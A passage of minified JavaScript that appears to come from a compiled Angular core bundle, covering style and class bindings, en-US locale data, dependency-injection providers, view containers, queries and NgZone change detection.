kie(t,a,e,i){t[rm(e?a.classBindings:a.styleBindings)]=i}(t,a,i,T))}else r=function Pie(t,a,e){let i;const n=a.directiveEnd;for(let r=1+a.directiveStylingLast;r<n;r++)i=jC(i,t[r].hostAttrs,e);return jC(i,a.attrs,e)}(t,a,i)}return void 0!==r&&(i?a.residualClasses=r:a.residualStyles=r),e}(n,r,a,i),function bie(t,a,e,i,n,r){let c=r?a.classBindings:a.styleBindings,d=rm(c),T=Mh(c);t[i]=e;let q,k=!1;if(Array.isArray(e)){const Y=e;q=Y[1],(null===q||Cl(Y,q)>0)&&(k=!0)}else q=e;if(n)if(0!==T){const te=rm(t[d+1]);t[i+1]=fv(te,d),0!==te&&(t[te+1]=qE(t[te+1],i)),t[d+1]=function pte(t,a){return 131071&t|a<<17}(t[d+1],i)}else t[i+1]=fv(d,0),0!==d&&(t[d+1]=qE(t[d+1],i)),d=i;else t[i+1]=fv(T,0),0===d?d=i:t[T+1]=qE(t[T+1],i),T=i;k&&(t[i+1]=UE(t[i+1])),SS(t,q,i,!0),SS(t,q,i,!1),function Mie(t,a,e,i,n){const r=n?t.residualClasses:t.residualStyles;null!=r&&"string"==typeof a&&Cl(r,a)>=0&&(e[i+1]=GE(e[i+1]))}(a,q,t,i,r),c=fv(d,T),r?a.classBindings=c:a.styleBindings=c}(n,r,a,e,c,i)}}function gD(t,a,e,i,n){let r=null;const c=e.directiveEnd;let d=e.directiveStylingLast;for(-1===d?d=e.directiveStart:d++;d<c&&(r=a[d],i=jC(i,r.hostAttrs,n),r!==t);)d++;return null!==t&&(e.directiveStylingLast=d),i}function jC(t,a,e){const i=e?1:2;let n=-1;if(null!==a)for(let r=0;r<a.length;r++){const c=a[r];"number"==typeof c?n=c:n===i&&(Array.isArray(t)||(t=void 0===t?[]:["",t]),_s(t,c,!!e||a[++r]))}return void 0===t?null:t}function VS(t,a,e){_s(t,a,Hc(e))}function BS(t,a,e,i,n,r,c,d){if(!(3&a.type))return;const T=t.data,k=T[d+1];Ev(function zR(t){return 1==(1&t)}(k)?HS(T,a,e,n,Mh(k),c):void 0)||(Ev(r)||function LR(t){return 2==(2&t)}(k)&&(r=HS(T,null,e,n,d,c)),function Fee(t,a,e,i,n){if(a)n?t.addClass(e,i):t.removeClass(e,i);else{let r=-1===i.indexOf("-")?void 0:vl.DashCase;null==n?t.removeStyle(e,i,r):("string"==typeof n&&n.endsWith("!important")&&(n=n.slice(0,-10),r|=vl.Important),t.setStyle(e,i,n,r))}}(i,c,$d(Ss(),e),n,r))}function HS(t,a,e,i,n,r){const c=null===a;let d;for(;n>0;){const T=t[n],k=Array.isArray(T),q=k?T[1]:T,Y=null===q;let te=e[n+1];te===mn&&(te=Y?Xn:void 0);let pe=Y?ch(te,i):q===i?te:void 0;if(k&&!Ev(pe)&&(pe=ch(T,i)),Ev(pe)&&(d=pe,c))return d;const Re=t[n+1];n=c?rm(Re):Mh(Re)}if(null!==a){let T=r?a.residualClasses:a.residualStyles;null!=T&&(d=ch(T,i))}return d}function Ev(t){return void 0!==t}function US(t,a){return 0!=(t.flags&(a?16:32))}function s(t,a=""){const e=bi(),i=Rn(),n=t+22,r=i.firstCreatePass?$0(i,n,1,a,null):i.data[n],c=e[n]=function SE(t,a){return t.createText(a)}(e[11],a);mv(i,e,c,r),_c(r,!1)}function ke(t){return ct("",t,""),ke}function ct(t,a,e){const i=bi(),n=Y0(i,t,a,e);return n!==mn&&vh(i,Ss(),n),ct}function za(t,a,e,i,n){const r=bi(),c=J0(r,t,a,e,i,n);return c!==mn&&vh(r,Ss(),c),za}function Y_(t,a,e,i,n,r,c){const d=bi(),T=Z0(d,t,a,e,i,n,r,c);return T!==mn&&vh(d,Ss(),T),Y_}function Dv(t,a,e){cm(_s,ou,Y0(bi(),t,a,e),!0)}function XS(t,a,e){!function nu(t){cm(VS,Iie,t,!1)}(Y0(bi(),t,a,e))}function Gs(t,a,e){const i=bi();return Mc(i,cd(),a)&&ql(Rn(),rr(),i,t,a,i[11],e,!0),Gs}function s1(t,a,e){const i=bi();if(Mc(i,cd(),a)){const r=Rn(),c=rr();ql(r,c,i,t,a,sS(Pf(r.data),c,i),e,!0)}return s1}const J_=void 0;var eae=["en",[["a","p"],["AM","PM"],J_],[["AM","PM"],J_,J_],[["S","M","T","W","T","F","S"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Su","Mo","Tu","We","Th","Fr","Sa"]],J_,[["J","F","M","A","M","J","J","A","S","O","N","D"],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],["January","February","March","April","May","June","July","August","September","October","November","December"]],J_,[["B","A"],["BC","AD"],["Before Christ","Anno Domini"]],0,[6,0],["M/d/yy","MMM d, y","MMMM d, y","EEEE, MMMM d, y"],["h:mm a","h:mm:ss a","h:mm:ss a z","h:mm:ss a zzzz"],["{1}, {0}",J_,"{1} 'at' {0}",J_],[".",",",";","%","+","-","E","\xd7","\u2030","\u221e","NaN",":"],["#,##0.###","#,##0%","\xa4#,##0.00","#E0"],"USD","$","US Dollar",{},"ltr",function Zie(t){const e=Math.floor(Math.abs(t)),i=t.toString().replace(/^[^.]*\.?/,"").length;return 1===e&&0===i?1:5}];let c1={};function Xc(t){const a=function iae(t){return t.toLowerCase().replace(/_/g,"-")}(t);let e=sk(a);if(e)return e;const i=a.split("-")[0];if(e=sk(i),e)return e;if("en"===i)return eae;throw new gi(701,!1)}function sk(t){return t in c1||(c1[t]=vo.ng&&vo.ng.common&&vo.ng.common.locales&&vo.ng.common.locales[t]),c1[t]}var Ji=(()=>((Ji=Ji||{})[Ji.LocaleId=0]="LocaleId",Ji[Ji.DayPeriodsFormat=1]="DayPeriodsFormat",Ji[Ji.DayPeriodsStandalone=2]="DayPeriodsStandalone",Ji[Ji.DaysFormat=3]="DaysFormat",Ji[Ji.DaysStandalone=4]="DaysStandalone",Ji[Ji.MonthsFormat=5]="MonthsFormat",Ji[Ji.MonthsStandalone=6]="MonthsStandalone",Ji[Ji.Eras=7]="Eras",Ji[Ji.FirstDayOfWeek=8]="FirstDayOfWeek",Ji[Ji.WeekendRange=9]="WeekendRange",Ji[Ji.DateFormat=10]="DateFormat",Ji[Ji.TimeFormat=11]="TimeFormat",Ji[Ji.DateTimeFormat=12]="DateTimeFormat",Ji[Ji.NumberSymbols=13]="NumberSymbols",Ji[Ji.NumberFormats=14]="NumberFormats",Ji[Ji.CurrencyCode=15]="CurrencyCode",Ji[Ji.CurrencySymbol=16]="CurrencySymbol",Ji[Ji.CurrencyName=17]="CurrencyName",Ji[Ji.Currencies=18]="Currencies",Ji[Ji.Directionality=19]="Directionality",Ji[Ji.PluralCase=20]="PluralCase",Ji[Ji.ExtraData=21]="ExtraData",Ji))();const l1="en-US";let ck=l1;function bD(t,a,e,i,n){if(t=La(t),Array.isArray(t))for(let r=0;r<t.length;r++)bD(t[r],a,e,i,n);else{const r=Rn(),c=bi();let d=je(t)?t:La(t.provide),T=dn(t);const k=or(),q=1048575&k.providerIndexes,Y=k.directiveStart,te=k.providerIndexes>>20;if(je(t)||!t.multi){const pe=new dd(T,n,Ee),Re=vD(d,a,n?q:q+te,Y);-1===Re?(Km(ah(k,c),r,d),MD(r,t,a.length),a.push(d),k.directiveStart++,k.directiveEnd++,n&&(k.providerIndexes+=1048576),e.push(pe),c.push(pe)):(e[Re]=pe,c[Re]=pe)}else{const pe=vD(d,a,q+te,Y),Re=vD(d,a,q,q+te),Fe=pe>=0&&e[pe],Ne=Re>=0&&e[Re];if(n&&!Ne||!n&&!Fe){Km(ah(k,c),r,d);const et=function Zae(t,a,e,i,n){const r=new dd(t,e,Ee);return r.multi=[],r.index=a,r.componentProviders=0,Pk(r,n,i&&!e),r}(n?Jae:Yae,e.length,n,i,T);!n&&Ne&&(e[Re].providerFactory=et),MD(r,t,a.length,0),a.push(d),k.directiveStart++,k.directiveEnd++,n&&(k.providerIndexes+=1048576),e.push(et),c.push(et)}else MD(r,t,pe>-1?pe:Re,Pk(e[n?Re:pe],T,!n&&i));!n&&i&&Ne&&e[Re].componentProviders++}}}function MD(t,a,e,i){const n=je(a),r=function tt(t){return!!t.useClass}(a);if(n||r){const T=(r?La(a.useClass):a).prototype.ngOnDestroy;if(T){const k=t.destroyHooks||(t.destroyHooks=[]);if(!n&&a.multi){const q=k.indexOf(e);-1===q?k.push(e,[i,T]):k[q+1].push(i,T)}else k.push(e,T)}}}function Pk(t,a,e){return e&&t.componentProviders++,t.multi.push(a)-1}function vD(t,a,e,i){for(let n=e;n<i;n++)if(a[n]===t)return n;return-1}function Yae(t,a,e,i){return AD(this.multi,[])}function Jae(t,a,e,i){const n=this.multi;let r;if(this.providerFactory){const c=this.providerFactory.componentProviders,d=Xm(e,e[1],this.providerFactory.index,i);r=d.slice(0,c),AD(n,r);for(let T=c;T<d.length;T++)r.push(d[T])}else r=[],AD(n,r);return r}function AD(t,a){for(let e=0;e<t.length;e++)a.push((0,t[e])());return a}function ki(t,a=[]){return e=>{e.providersResolver=(i,n)=>function Xae(t,a,e){const i=Rn();if(i.firstCreatePass){const n=gr(t);bD(e,i.data,i.blueprint,n,!0),bD(a,i.data,i.blueprint,n,!1)}}(i,n?n(t):t,a)}}class Z_{}class Ok{}class Nk extends Z_{constructor(a,e){super(),this._parent=e,this._bootstrapComponents=[],this.destroyCbs=[],this.componentFactoryResolver=new dD(this);const i=ds(a);this._bootstrapComponents=bh(i.bootstrap),this._r3Injector=wR(a,e,[{provide:Z_,useValue:this},{provide:On,useValue:this.componentFactoryResolver}],Wo(a),new Set(["environment"])),this._r3Injector.resolveInjectorInitializers(),this.instance=this._r3Injector.get(a)}get injector(){return this._r3Injector}destroy(){const a=this._r3Injector;!a.destroyed&&a.destroy(),this.destroyCbs.forEach(e=>e()),this.destroyCbs=null}onDestroy(a){this.destroyCbs.push(a)}}class TD extends Ok{constructor(a){super(),this.moduleType=a}create(a){return new Nk(this.moduleType,a)}}class tne extends Z_{constructor(a,e,i){super(),this.componentFactoryResolver=new dD(this),this.instance=null;const n=new ui([...a,{provide:Z_,useValue:this},{provide:On,useValue:this.componentFactoryResolver}],e||Lt(),i,new Set(["environment"]));this.injector=n,n.resolveInjectorInitializers()}destroy(){this.injector.destroy()}onDestroy(a){this.injector.onDestroy(a)}}function Sv(t,a,e=null){return new tne(t,a,e).injector}let ine=(()=>{class t{constructor(e){this._injector=e,this.cachedInjectors=new Map}getOrCreateStandaloneInjector(e){if(!e.standalone)return null;if(!this.cachedInjectors.has(e.id)){const i=cv(0,e.type),n=i.length>0?Sv([i],this._injector,`Standalone[${e.type.name}]`):null;this.cachedInjectors.set(e.id,n)}return this.cachedInjectors.get(e.id)}ngOnDestroy(){try{for(const e of this.cachedInjectors.values())null!==e&&e.destroy()}finally{this.cachedInjectors.clear()}}}return t.\u0275prov=hi({token:t,providedIn:"environment",factory:()=>new t(At(Ht))}),t})();function Lk(t){t.getStandaloneInjector=a=>a.get(ine).getOrCreateStandaloneInjector(t)}function kr(t,a,e){const i=fs()+t,n=bi();return n[i]===mn?au(n,i,e?a.call(e):a()):function UC(t,a){return t[a]}(n,i)}function fr(t,a,e,i){return Uk(bi(),fs(),t,a,e,i)}function Ah(t,a,e,i,n){return qk(bi(),fs(),t,a,e,i,n)}function JC(t,a){const e=t[a];return e===mn?void 0:e}function Uk(t,a,e,i,n,r){const c=a+e;return Mc(t,c,n)?au(t,c+1,r?i.call(r,n):i(n)):JC(t,c+1)}function qk(t,a,e,i,n,r,c){const d=a+e;return X_(t,d,n,r)?au(t,d+2,c?i.call(c,n,r):i(n,r)):JC(t,d+2)}function oe(t,a){const e=Rn();let i;const n=t+22;e.firstCreatePass?(i=function Cne(t,a){if(a)for(let e=a.length-1;e>=0;e--){const i=a[e];if(t===i.name)return i}}(a,e.pipeRegistry),e.data[n]=i,i.onDestroy&&(e.destroyHooks||(e.destroyHooks=[])).push(n,i.onDestroy)):i=e.data[n];const r=i.factory||(i.factory=Qd(i.type)),c=Bs(Ee);try{const d=Lf(!1),T=r();return Lf(d),function fie(t,a,e,i){e>=t.data.length&&(t.data[e]=null,t.blueprint[e]=null),a[e]=i}(e,bi(),n,T),T}finally{Bs(c)}}function re(t,a,e){const i=t+22,n=bi(),r=Lc(n,i);return ZC(n,i)?Uk(n,fs(),a,r.transform,e,r):r.transform(e)}function ZC(t,a){return t[1].data[a].pure}function DD(t){return a=>{setTimeout(t,void 0,a)}}const Tt=class vne extends J{constructor(a=!1){super(),this.__isAsync=a}emit(a){super.next(a)}subscribe(a,e,i){var n,r,c;let d=a,T=e||(()=>null),k=i;if(a&&"object"==typeof a){const Y=a;d=null===(n=Y.next)||void 0===n?void 0:n.bind(Y),T=null===(r=Y.error)||void 0===r?void 0:r.bind(Y),k=null===(c=Y.complete)||void 0===c?void 0:c.bind(Y)}this.__isAsync&&(T=DD(T),d&&(d=DD(d)),k&&(k=DD(k)));const q=super.subscribe({next:d,error:T,complete:k});return a instanceof I&&a.add(q),q}};function Ane(){return this._results[K_()]()}class Cd{constructor(a=!1){this._emitDistinctChangesOnly=a,this.dirty=!0,this._results=[],this._changesDetected=!1,this._changes=null,this.length=0,this.first=void 0,this.last=void 0;const e=K_(),i=Cd.prototype;i[e]||(i[e]=Ane)}get changes(){return this._changes||(this._changes=new Tt)}get(a){return this._results[a]}map(a){return this._results.map(a)}filter(a){return this._results.filter(a)}find(a){return this._results.find(a)}reduce(a,e){return this._results.reduce(a,e)}forEach(a){this._results.forEach(a)}some(a){return this._results.some(a)}toArray(){return this._results.slice()}toString(){return this._results.toString()}reset(a,e){const i=this;i.dirty=!1;const n=ac(a);(this._changesDetected=!function yC(t,a,e){if(t.length!==a.length)return!1;for(let i=0;i<t.length;i++){let n=t[i],r=a[i];if(e&&(n=e(n),r=e(r)),r!==n)return!1}return!0}(i._results,n,e))&&(i._results=n,i.length=n.length,i.last=n[this.length-1],i.first=n[0])}notifyOnChanges(){this._changes&&(this._changesDetected||!this._emitDistinctChangesOnly)&&this._changes.emit(this)}setDirty(){this.dirty=!0}destroy(){this.changes.complete(),this.changes.unsubscribe()}}let ho=(()=>{class t{}return t.__NG_ELEMENT_ID__=Dne,t})();const Tne=ho,Ene=class extends Tne{constructor(a,e,i){super(),this._declarationLView=a,this._declarationTContainer=e,this.elementRef=i}createEmbeddedView(a,e){const i=this._declarationTContainer.tViews,n=gv(this._declarationLView,i,a,16,null,i.declTNode,null,null,null,null,e||null);n[17]=this._declarationLView[this._declarationTContainer.index];const c=this._declarationLView[19];return null!==c&&(n[19]=c.createEmbeddedView(i)),eD(i,n,a),new VC(n)}};function Dne(){return kv(or(),bi())}function kv(t,a){return 4&t.type?new Ene(a,t,jc(t,a)):null}let fo=(()=>{class t{}return t.__NG_ELEMENT_ID__=xne,t})();function xne(){return Yk(or(),bi())}const wne=fo,Kk=class extends wne{constructor(a,e,i){super(),this._lContainer=a,this._hostTNode=e,this._hostLView=i}get element(){return jc(this._hostTNode,this._hostLView)}get injector(){return new Ym(this._hostTNode,this._hostLView)}get parentInjector(){const a=Jd(this._hostTNode,this._hostLView);if(x0(a)){const e=Qm(a,this._hostLView),i=md(a);return new Ym(e[1].data[i+8],e)}return new Ym(null,this._hostLView)}clear(){for(;this.length>0;)this.remove(this.length-1)}get(a){const e=Xk(this._lContainer);return null!==e&&e[a]||null}get length(){return this._lContainer.length-10}createEmbeddedView(a,e,i){let n,r;"number"==typeof i?n=i:null!=i&&(n=i.index,r=i.injector);const c=a.createEmbeddedView(e||{},r);return this.insert(c,n),c}createComponent(a,e,i,n,r){const c=a&&!function oh(t){return"function"==typeof t}(a);let d;if(c)d=e;else{const Y=e||{};d=Y.index,i=Y.injector,n=Y.projectableNodes,r=Y.environmentInjector||Y.ngModuleRef}const T=c?a:new BC(Un(a)),k=i||this.parentInjector;if(!r&&null==T.ngModule){const te=(c?k:this.parentInjector).get(Ht,null);te&&(r=te)}const q=T.create(k,n,void 0,r);return this.insert(q.hostView,d),q}insert(a,e){const i=a._lView,n=i[1];if(function eC(t){return Is(t[3])}(i)){const q=this.indexOf(a);if(-1!==q)this.detach(q);else{const Y=i[3],te=new Kk(Y,Y[6],Y[3]);te.detach(te.indexOf(a))}}const r=this._adjustIndex(e),c=this._lContainer;!function See(t,a,e,i){const n=10+i,r=e.length;i>0&&(e[n-1][4]=a),i<r-10?(a[4]=e[n],P_(e,10+i,a)):(e.push(a),a[4]=null),a[3]=e;const c=a[17];null!==c&&e!==c&&function kee(t,a){const e=t[9];a[16]!==a[3][3][16]&&(t[2]=!0),null===e?t[9]=[a]:e.push(a)}(c,a);const d=a[19];null!==d&&d.insertView(t),a[2]|=64}(n,i,c,r);const d=LE(r,c),T=i[11],k=dv(T,c[7]);return null!==k&&function wee(t,a,e,i,n,r){i[0]=n,i[6]=a,FC(t,i,e,1,n,r)}(n,c[6],T,i,k,d),a.attachToViewContainerRef(),P_(xD(c),r,a),a}move(a,e){return this.insert(a,e)}indexOf(a){const e=Xk(this._lContainer);return null!==e?e.indexOf(a):-1}remove(a){const e=this._adjustIndex(a,-1),i=PE(this._lContainer,e);i&&(rh(xD(this._lContainer),e),oR(i[1],i))}detach(a){const e=this._adjustIndex(a,-1),i=PE(this._lContainer,e);return i&&null!=rh(xD(this._lContainer),e)?new VC(i):null}_adjustIndex(a,e=0){return null==a?this.length+e:a}};function Xk(t){return t[8]}function xD(t){return t[8]||(t[8]=[])}function Yk(t,a){let e;const i=a[t.index];if(Is(i))e=i;else{let n;if(8&t.type)n=Ar(i);else{const r=a[11];n=r.createComment("");const c=pc(t,a);$_(r,dv(r,c),n,function Lee(t,a){return t.nextSibling(a)}(r,c),!1)}a[t.index]=e=nS(i,a,n,t),yv(a,e)}return new Kk(e,t,a)}class wD{constructor(a){this.queryList=a,this.matches=null}clone(){return new wD(this.queryList)}setDirty(){this.queryList.setDirty()}}class ID{constructor(a=[]){this.queries=a}createEmbeddedView(a){const e=a.queries;if(null!==e){const i=null!==a.contentQueries?a.contentQueries[0]:e.length,n=[];for(let r=0;r<i;r++){const c=e.getByIndex(r);n.push(this.queries[c.indexInDeclarationView].clone())}return new ID(n)}return null}insertView(a){this.dirtyQueriesWithMatches(a)}detachView(a){this.dirtyQueriesWithMatches(a)}dirtyQueriesWithMatches(a){for(let e=0;e<this.queries.length;e++)null!==a9(a,e).matches&&this.queries[e].setDirty()}}class Jk{constructor(a,e,i=null){this.predicate=a,this.flags=e,this.read=i}}class RD{constructor(a=[]){this.queries=a}elementStart(a,e){for(let i=0;i<this.queries.length;i++)this.queries[i].elementStart(a,e)}elementEnd(a){for(let e=0;e<this.queries.length;e++)this.queries[e].elementEnd(a)}embeddedTView(a){let e=null;for(let i=0;i<this.length;i++){const n=null!==e?e.length:0,r=this.getByIndex(i).embeddedTView(a,n);r&&(r.indexInDeclarationView=i,null!==e?e.push(r):e=[r])}return null!==e?new RD(e):null}template(a,e){for(let i=0;i<this.queries.length;i++)this.queries[i].template(a,e)}getByIndex(a){return this.queries[a]}get length(){return this.queries.length}track(a){this.queries.push(a)}}class SD{constructor(a,e=-1){this.metadata=a,this.matches=null,this.indexInDeclarationView=-1,this.crossesNgTemplate=!1,this._appliesToNextNode=!0,this._declarationNodeIndex=e}elementStart(a,e){this.isApplyingToNode(e)&&this.matchTNode(a,e)}elementEnd(a){this._declarationNodeIndex===a.index&&(this._appliesToNextNode=!1)}template(a,e){this.elementStart(a,e)}embeddedTView(a,e){return this.isApplyingToNode(a)?(this.crossesNgTemplate=!0,this.addMatch(-a.index,e),new SD(this.metadata)):null}isApplyingToNode(a){if(this._appliesToNextNode&&1!=(1&this.metadata.flags)){const e=this._declarationNodeIndex;let i=a.parent;for(;null!==i&&8&i.type&&i.index!==e;)i=i.parent;return e===(null!==i?i.index:-1)}return this._appliesToNextNode}matchTNode(a,e){const i=this.metadata.predicate;if(Array.isArray(i))for(let n=0;n<i.length;n++){const r=i[n];this.matchTNodeWithReadOption(a,e,Sne(e,r)),this.matchTNodeWithReadOption(a,e,nh(e,a,r,!1,!1))}else i===ho?4&e.type&&this.matchTNodeWithReadOption(a,e,-1):this.matchTNodeWithReadOption(a,e,nh(e,a,i,!1,!1))}matchTNodeWithReadOption(a,e,i){if(null!==i){const n=this.metadata.read;if(null!==n)if(n===mi||n===fo||n===ho&&4&e.type)this.addMatch(e.index,-2);else{const r=nh(e,a,n,!1,!1);null!==r&&this.addMatch(e.index,r)}else this.addMatch(e.index,i)}}addMatch(a,e){null===this.matches?this.matches=[a,e]:this.matches.push(a,e)}}function Sne(t,a){const e=t.localNames;if(null!==e)for(let i=0;i<e.length;i+=2)if(e[i]===a)return e[i+1];return null}function Pne(t,a,e,i){return-1===e?function kne(t,a){return 11&t.type?jc(t,a):4&t.type?kv(t,a):null}(a,t):-2===e?function One(t,a,e){return e===mi?jc(a,t):e===ho?kv(a,t):e===fo?Yk(a,t):void 0}(t,a,i):Xm(t,t[1],e,a)}function Zk(t,a,e,i){const n=a[19].queries[i];if(null===n.matches){const r=t.data,c=e.matches,d=[];for(let T=0;T<c.length;T+=2){const k=c[T];d.push(k<0?null:Pne(a,r[k],c[T+1],e.metadata.read))}n.matches=d}return n.matches}function kD(t,a,e,i){const n=t.queries.getByIndex(e),r=n.matches;if(null!==r){const c=Zk(t,a,n,e);for(let d=0;d<r.length;d+=2){const T=r[d];if(T>0)i.push(c[d/2]);else{const k=r[d+1],q=a[-T];for(let Y=10;Y<q.length;Y++){const te=q[Y];te[17]===te[3]&&kD(te[1],te,k,i)}if(null!==q[9]){const Y=q[9];for(let te=0;te<Y.length;te++){const pe=Y[te];kD(pe[1],pe,k,i)}}}}}return i}function Vt(t){const a=bi(),e=Rn(),i=ld();g_(i+1);const n=a9(e,i);if(t.dirty&&function $u(t){return 4==(4&t[2])}(a)===(2==(2&n.metadata.flags))){if(null===n.matches)t.reset([]);else{const r=n.crossesNgTemplate?kD(e,a,i,[]):Zk(e,a,n,i);t.reset(r,yc),t.notifyOnChanges()}return!0}return!1}function Mi(t,a,e){const i=Rn();i.firstCreatePass&&(t9(i,new Jk(t,a,e),-1),2==(2&a)&&(i.staticViewQueries=!0)),e9(i,bi(),a)}function fa(t,a,e,i){const n=Rn();if(n.firstCreatePass){const r=or();t9(n,new Jk(a,e,i),r.index),function Lne(t,a){const e=t.contentQueries||(t.contentQueries=[]);a!==(e.length?e[e.length-1]:-1)&&e.push(t.queries.length-1,a)}(n,t),2==(2&e)&&(n.staticContentQueries=!0)}e9(n,bi(),e)}function Bt(){return function Nne(t,a){return t[19].queries[a].queryList}(bi(),ld())}function e9(t,a,e){const i=new Cd(4==(4&e));KR(t,a,i,i.destroy),null===a[19]&&(a[19]=new ID),a[19].queries.push(new wD(i))}function t9(t,a,e){null===t.queries&&(t.queries=new RD),t.queries.track(new SD(a,e))}function a9(t,a){return t.queries.getByIndex(a)}function d1(t,a){return kv(t,a)}function Ov(...t){}const Nv=new ni("Application Initializer");let Lv=(()=>{class t{constructor(e){this.appInits=e,this.resolve=Ov,this.reject=Ov,this.initialized=!1,this.done=!1,this.donePromise=new Promise((i,n)=>{this.resolve=i,this.reject=n})}runInitializers(){if(this.initialized)return;const e=[],i=()=>{this.done=!0,this.resolve()};if(this.appInits)for(let n=0;n<this.appInits.length;n++){const r=this.appInits[n]();if(qC(r))e.push(r);else if(fD(r)){const c=new Promise((d,T)=>{r.subscribe({complete:d,error:T})});e.push(c)}}Promise.all(e).then(()=>{i()}).catch(n=>{this.reject(n)}),0===e.length&&i(),this.initialized=!0}}return t.\u0275fac=function(e){return new(e||t)(At(Nv,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const h1=new ni("AppId",{providedIn:"root",factory:function v9(){return`${zD()}${zD()}${zD()}`}});function zD(){return String.fromCharCode(97+Math.floor(25*Math.random()))}const A9=new ni("Platform Initializer"),lm=new ni("Platform ID",{providedIn:"platform",factory:()=>"unknown"}),T9=new ni("appBootstrapListener"),ar=new ni("AnimationModuleType");let ioe=(()=>{class t{log(e){console.log(e)}warn(e){console.warn(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"platform"}),t})();const dm=new ni("LocaleId",{providedIn:"root",factory:()=>Po(dm,Da.Optional|Da.SkipSelf)||function aoe(){return"undefined"!=typeof $localize&&$localize.locale||l1}()});class ooe{constructor(a,e){this.ngModuleFactory=a,this.componentFactories=e}}let WD=(()=>{class t{compileModuleSync(e){return new TD(e)}compileModuleAsync(e){return Promise.resolve(this.compileModuleSync(e))}compileModuleAndAllComponentsSync(e){const i=this.compileModuleSync(e),r=bh(ds(e).declarations).reduce((c,d)=>{const T=Un(d);return T&&c.push(new BC(T)),c},[]);return new ooe(i,r)}compileModuleAndAllComponentsAsync(e){return Promise.resolve(this.compileModuleAndAllComponentsSync(e))}clearCache(){}clearCacheFor(e){}getModuleId(e){}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const coe=(()=>Promise.resolve(0))();function FD(t){"undefined"==typeof Zone?coe.then(()=>{t&&t.apply(null,null)}):Zone.current.scheduleMicroTask("scheduleMicrotask",t)}class qi{constructor({enableLongStackTrace:a=!1,shouldCoalesceEventChangeDetection:e=!1,shouldCoalesceRunChangeDetection:i=!1}){if(this.hasPendingMacrotasks=!1,this.hasPendingMicrotasks=!1,this.isStable=!0,this.onUnstable=new Tt(!1),this.onMicrotaskEmpty=new Tt(!1),this.onStable=new Tt(!1),this.onError=new Tt(!1),"undefined"==typeof Zone)throw new gi(908,!1);Zone.assertZonePatched();const n=this;if(n._nesting=0,n._outer=n._inner=Zone.current,Zone.AsyncStackTaggingZoneSpec){const r=Zone.AsyncStackTaggingZoneSpec;n._inner=n._inner.fork(new r("Angular"))}Zone.TaskTrackingZoneSpec&&(n._inner=n._inner.fork(new Zone.TaskTrackingZoneSpec)),a&&Zone.longStackTraceZoneSpec&&(n._inner=n._inner.fork(Zone.longStackTraceZoneSpec)),n.shouldCoalesceEventChangeDetection=!i&&e,n.shouldCoalesceRunChangeDetection=i,n.lastRequestAnimationFrameId=-1,n.nativeRequestAnimationFrame=function loe(){let t=vo.requestAnimationFrame,a=vo.cancelAnimationFrame;if("undefined"!=typeof Zone&&t&&a){const e=t[Zone.__symbol__("OriginalDelegate")];e&&(t=e);const i=a[Zone.__symbol__("OriginalDelegate")];i&&(a=i)}return{nativeRequestAnimationFrame:t,nativeCancelAnimationFrame:a}}().nativeRequestAnimationFrame,function uoe(t){const a=()=>{!function moe(t){t.isCheckStableRunning||-1!==t.lastRequestAnimationFrameId||(t.lastRequestAnimationFrameId=t.nativeRequestAnimationFrame.call(vo,()=>{t.fakeTopEventTask||(t.fakeTopEventTask=Zone.root.scheduleEventTask("fakeTopEventTask",()=>{t.lastRequestAnimationFrameId=-1,BD(t),t.isCheckStableRunning=!0,VD(t),t.isCheckStableRunning=!1},void 0,()=>{},()=>{})),t.fakeTopEventTask.invoke()}),BD(t))}(t)};t._inner=t._inner.fork({name:"angular",properties:{isAngularZone:!0},onInvokeTask:(e,i,n,r,c,d)=>{try{return x9(t),e.invokeTask(n,r,c,d)}finally{(t.shouldCoalesceEventChangeDetection&&"eventTask"===r.type||t.shouldCoalesceRunChangeDetection)&&a(),w9(t)}},onInvoke:(e,i,n,r,c,d,T)=>{try{return x9(t),e.invoke(n,r,c,d,T)}finally{t.shouldCoalesceRunChangeDetection&&a(),w9(t)}},onHasTask:(e,i,n,r)=>{e.hasTask(n,r),i===n&&("microTask"==r.change?(t._hasPendingMicrotasks=r.microTask,BD(t),VD(t)):"macroTask"==r.change&&(t.hasPendingMacrotasks=r.macroTask))},onHandleError:(e,i,n,r)=>(e.handleError(n,r),t.runOutsideAngular(()=>t.onError.emit(r)),!1)})}(n)}static isInAngularZone(){return"undefined"!=typeof Zone&&!0===Zone.current.get("isAngularZone")}static assertInAngularZone(){if(!qi.isInAngularZone())throw new gi(909,!1)}static assertNotInAngularZone(){if(qi.isInAngularZone())throw new gi(909,!1)}run(a,e,i){return this._inner.run(a,e,i)}runTask(a,e,i,n){const r=this._inner,c=r.scheduleEventTask("NgZoneEvent: "+n,a,doe,Ov,Ov);try{return r.runTask(c,e,i)}finally{r.cancelTask(c)}}runGuarded(a,e,i){return this._inner.runGuarded(a,e,i)}runOutsideAngular(a){return this._outer.run(a)}}const doe={};function VD(t){if(0==t._nesting&&!t.hasPendingMicrotasks&&!t.isStable)try{t._nesting++,t.onMicrotaskEmpty.emit(null)}finally{if(t._nesting--,!t.hasPendingMicrotasks)try{t.runOutsideAngular(()=>t.onStable.emit(null))}finally{t.isStable=!0}}}function BD(t){t.hasPendingMicrotasks=!!(t._hasPendingMicrotasks||(t.shouldCoalesceEventChangeDetection||t.shouldCoalesceRunChangeDetection)&&-1!==t.lastRequestAnimationFrameId)}function x9(t){t._nesting++,t.isStable&&(t.isStable=!1,t.onUnstable.emit(null))}function w9(t){t._nesting--,VD(t)}class hoe{constructor(){this.hasPendingMicrotasks=!1,this.hasPendingMacrotasks=!1,this.isStable=!0,this.onUnstable=new Tt,this.onMicrotaskEmpty=new Tt,this.onStable=new Tt,this.onError=new Tt}run(a,e,i){return a.apply(e,i)}runGuarded(a,e,i){return a.apply(e,i)}runOutsideAngular(a){return a()}runTask(a,e,i,n){return a.apply(e,i)}}const I9=new ni(""),zv=new ni("");let ty,HD=(()=>{class t{constructor(e,i,n){this._ngZone=e,this.registry=i,this._pendingCount=0,this._isZoneStable=!0,this._didWork=!1,this._callbacks=[],this.taskTrackingZone=null,ty||(function 